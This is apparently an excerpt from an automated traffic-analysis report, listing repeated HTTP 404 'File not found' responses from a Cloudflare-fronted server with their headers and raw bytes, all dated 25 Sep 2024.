                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:07 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nG%2BHNvFNULyT4%2FWAOFCzIX4eFuLkMqg88C6OhEEyWIZh6vYLNNcRncuI4bx0Zf7XAN5E2FI6Leomfwm3j74aD6sUDivQ7TGDpuCiNVQIWfhjMPznHtSg4Qw2FsMhcQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c7abcef0f9f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iFDPp5lu4YV2W6dMQAd%2B2ShykyGScHmyYuiTtqTIYAT1Y8tD4RvOLUNr4cmwACWt1GsmjtpAgaArCc1JF8gWlqKVzAR9ou0rxSzxTMPcGhE0eNbpob%2FfEjE7umTbNA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c801d30c32d-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:08 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gVO%2F5A8JAU9qQZcaVERm1%2BEgkkCK5hujTQWyYMbZ4oOPVyyCdzBFkA7EHUqEpTu5Zx%2BSea8pJHtLZ2e2grtdKQ%2B5s3oss4ew%2Bli4%2BEoA1DZUMzZZVmsEjVFwY5o3vA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c8578edc41d-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:09 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LU4VHpSzuRNjh8ksC51UaT0dS2iyoIu1dBWDF97muLVazraUNDK5b31qRII4Gw6uoQFkTWNGwTbbVT4AxD1%2FZusqGf1pmy4BlVV9AOLTQGnWoiRu%2BCANEuHK5mvDYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c8b0dde0c88-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:10 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q5areRQ8RVW6i6Kx6nB6uSw5wKrsFsOgbT0dL7Mfu4Q2hhnTp836gcPsrU82P0%2FHooIINORbheluJd75JC%2F%2B9l3XpDYnOjrRBqwYxXvXyZnfhOJXcYnPLvml34hu3Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c9058956a56-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:11 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R%2BBwQmk6VYBP02j2IOZyhBsJqsFAomMn57IGmAw4OlCPmVL8%2FNIABK3M59fGdrktaeHydS5Ew5Ya5Af3WHq%2FK8Qyoxq7Gm572XC8Y8nhUR6aPZdH%2BQ0Hy3ZlPbTQuA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c95afc141ba-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:12 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMM1Rkn41hTZYUJPHhUBND%2BJW7hWiAF%2BAlEbpcMcgSa8Vid9%2FbfJljfxwGlNCgHPymwigeeCcuny5oQLco%2FgLmg0kKGbXbKQC4JYQgEZfuPVAxJ5osBaAXIHUm%2B7Vg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5c9b09644334-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:13 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3VqhxYLrrdmvgSdAClARJFzkNwAILHaHWhTqdbWqRChvC8LlsaHa3DMDi1JWkTfMdZCJCB0uWALHoG2caS0vo0Y9uX04bMK2SzEiu1CQ2m5GlZLlZalasbUS3tgNSw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ca04f4d72ab-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:14 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p5sOSwaj8fiRlIM0KxBG9%2FihxdXciMHWHYqrZl3lpO6Tw2MQ2PrOUgUY2dS%2FuXYUUH90chAAokGnLtgULc8BeCim9iViGhawgLfCKJHMYiToVkI3XWEK%2BdhxDnvJ9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ca60be40f80-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:15 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FjTa9SGbqI7tRrMn1jg7fOzn0AC9BrGKXpijpand7O4aqZEcn9M0RT%2BHbujCgl182XHxUIUa8CCz7q8OPzVMiNnWY5GjByE2gBIff5dTkiFb5vBQ5xs%2FctcX5YCU8Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cabe8ff728a-EWRalt-svc: h3=":443"; ma=86400Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:16 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3%2Blj5W9CMb7bYuc1WgWZrzJzhoba8cGZTChAW5Sf4pmJjePQ1jFkvsB5XLLCF959uNkilwnITpVWR0urSeOJkB3rT36Z7t%2BewpUR2lXPCKcgwzvX9SWtje50TmiyTw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cb169384294-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AjVi%2BJY08PU2qF6z7Fp3wKYVLkB5w0UjSjkmgA9EiMMNLuTuQ1U6VJK3iWgb6K1UZoaeWbqb%2Ba9DmXwcyMq2YApCmUNBkf%2FQYkibzYpcV7P3qTMvpU0QVxTVr9aD%2Fg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cb7bdda8c21-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:17 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5USiq06nU9CvyG6s%2FYmEoxMMTb0IVJl4IF%2BXD9v0uYxicdoUZDFyWBQt9srOnyKJSkhUZ619IvuZrcx2sYo4upqkwrE%2FAceHu%2BuE%2BBkqXP9KLxyoLqf1SRKtkAxhvA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cbd4eb918c8-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:18 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3EU8%2B25wVUKr3ZSxY9sIltURD30coBaEmVUSPH2tqOQ5tWNe1vOLfHKGoCm2ZwXN5enyje19NI01dAP4F3QrxMekdYcM9a%2Bb4%2B231qAjhFtGXLATBehgfOikDDHr9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cc2cfee4387-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:19 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YH8pWS7ejYbgZXREx2F36uyVO65M4Mkhk3hCbYXiOVjobNHSTgOG%2FPPz%2FKjGK%2ByP6vE1Cznd28RlMy2MD%2B7Dw9oGq9Nu%2BoUvfhqxNAtHbfL%2BO2aybcnkvYHvhapHbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cc7ef8b0f46-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:20 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RHozBnsqQW4Ox17iwblUh6J1btJswwpNeBFm8e9Ed8w6LkXnnHL30FLEbXklfh5ZFS81v5g%2FAv%2F8gnCv66S8V20258B7Rqdmj%2FiEKNMZjLi8VX%2BFQ0ctxeRHz%2FIVHw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ccd2c911927-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:21 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Cd%2BfFcMh2A%2FZGKQ%2FZaHKDfXXajx3RHwxnh5BdIZV1fZi4Nn8zVydkmHeamxp7AcUMm%2BJDlMQf4wmWb2jWe8jwwBhpMO5CSREM%2FdwPff5QN9vrC%2FentMgTCuhIb1ZAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cd2b9487cf9-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:22 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XV6BrJcsazT9zE0dwdBUaAGVU2cAo8SuOv9K7gGhstYEZtjJvdiYWt12Lc9VRDSXX%2Fy3RB1U7JRqomkxB0GzptYkbYdXN%2BrkSYEMIDO7rMirXBSvt8QSOvmiK5C%2B9w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cda3e9142cf-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:23 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AsATlgmJbQqTrJ4HJ1piEoXJGeObj7OAX7TMIjn1Hzv0jiOjK5kOzY6IIORurRR%2FA8NepUojq9Asm9yXrqwFw0u%2FH7fRKHJGQ9BikCTZoOjN2IhFdm1GqH0d5LaLoQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ce10db55e71-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:24 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E1MnEgN0mFEU5Fky3%2Fw5npF1Q1dCugFbxbLCxsOjw5GQuGGBHLPaxIvwXNcB%2BqTYKShTQvrZpWSbCESCEEGU2EMjbzhhPx3OL1RhEHrknEvhZHcFegQFYkLOXdNmgQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ce728df8c6f-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:26 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=q4BHhqcH%2Fyoa5%2FkRcibFslv2VY0SMK%2Bvznf1Ba1Alrx4Osk12VfRctXkT7WTLvChVhcV2N1k%2BECdRoqk8KrM9XPB6oElPIeqsUjA6u7nGfpcNgm6LR3w3A7nS4Oe4g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5ced3c1f15c3-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:27 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nBMJGDhIZ%2F9aSBWnYLvsdnaDT015GCje4O7mFdLQNh7Wg%2BhRx2YZOvqjwSZlzrZS1EAfbtagekv8fiTvwn6nPWU5TalsUlXarTjPjklf%2BLZtCH2eN3KWWpYJDQWhTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cfa9aed8c90-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:28 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=63zgE5drxHCH9jQ4U4Fw82xXgeWFeMrky00UeX1eY0DkoUmAdh9fJEgaX5OTIQYRkkFsvbi0%2FdotyByksK4fv%2BqBFao0utRgXzEUq4GzfnAymW9iPUpMJcfqVdp8eA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5cffbded4346-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:29 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6FpLvkziSSC6Eh8wxbf42gNsezX7Xfw2ds4UM%2BGHQZNmsFMlatvtAGS3cHMzDIXHgloaJcLa1plcUvqU%2BI3FgIxgTONLRkg%2FjVHMbL%2BuKhuAqA6a5FBSnDdkLwFEWw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d065a124252-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:30 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=me13Y31WAhmfT9FVxH36LNpfIdG80k8d0p8sXIEwrLroqQRom4ukzBeVF%2FzauvSD1B1f6x8O0N%2Fe9Jk%2BqQkzkGGKQdhtAmE%2FEv8kMAhjCsux1O%2BN3vLMI0J92aFoaQ%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d0b9bb5335a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMzvFkAjBl9JIFzELm1ZTMO13IkZi31yX2isW869fdfrPvf5Dh3QYwgAVPsaLZGKKJ3YJuA1t7r9JGrwGdqdYETW5SWnrCbcid%2BiPsnMMFEruhtLYeJmQ7YM5JNolw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d10bb9b7cfc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:31 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MMzvFkAjBl9JIFzELm1ZTMO13IkZi31yX2isW869fdfrPvf5Dh3QYwgAVPsaLZGKKJ3YJuA1t7r9JGrwGdqdYETW5SWnrCbcid%2BiPsnMMFEruhtLYeJmQ7YM5JNolw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d10bb9b7cfc-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:32 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0UehFcoHGJpvENXvInstUHfOrGu%2BwfCQ%2FvNPjiw3qZ6B4N4fXAYBNXvmtQVLPAB0WzD3jcqkf7XvLa2kHq%2BZg7k2he0DP1jtx0Lh%2FojpxGFRGo4UENzb0h8uaCiVA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d18ed0041ef-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:33 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAWD3b30w%2Fi21QMhcKkxdoso40gNLQlTpFADVa52xbRGhOJF8p9l2H%2B55XjRDLYp43bmUpE8CqvB62wD1uC6FgfH1M%2Fsko2TW%2Bp35jcuzH4bCGmGqVvnDNzanTk5kw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d1e7d92438a-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:34 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnHz6aVVyPIp%2FL4wUj%2BYuwTslJMjiuEoLGWo1B5iOD1e3UtZnGXSPI48eQ%2BKChsAbxda6BNyF0UKR%2Bk7nuHESEWuVIUWgPXiw0MGgM6VZNAcFvJq8spmYEIkbuxOdg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d23ddc40c90-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mV1Fb723itILU95SlMngf6iW8Xl5jyKV1tBrLOPFcHiXGsyBRHoN2nmwjrFoG8HcO1bcbBvmgk%2FRcW02EuzvU1gAZv%2FKUMXV8mMdTEWmT8EsmoDH%2FISHM4Z5%2BZbq3g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d295bdd42f8-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:35 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYfbhEoHVCAojQNhIxycqgCkGHXKbNViPzFkztkB0gXI34b0uQVa2VrwsGKyHYXr3usWGybs0OaqHAs8Sqzg84ehPA0rgPlw%2Bsbd%2FMfHpPEP2fIOtoN%2Bv3%2FogE4JPA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d2e8bb90f81-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 25 Sep 2024 13:29:36 GMTContent-Type: text/html; charset=UTF-8Connection: closeStatus: 404 Not FoundCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AtZh7toPRDn9Iz8XFhxn%2FqKpZRx0ZpvjuTYXMe7RjKzMKFdemdNSzZKIGZGv3d2ssbPCiblQxQCUHGqAxmWWimyUFipY9yhMxrFSfX%2F6Z1xmlEGJ0na6LgdIs2VJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8c8b5d33c9637cf6-EWRData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
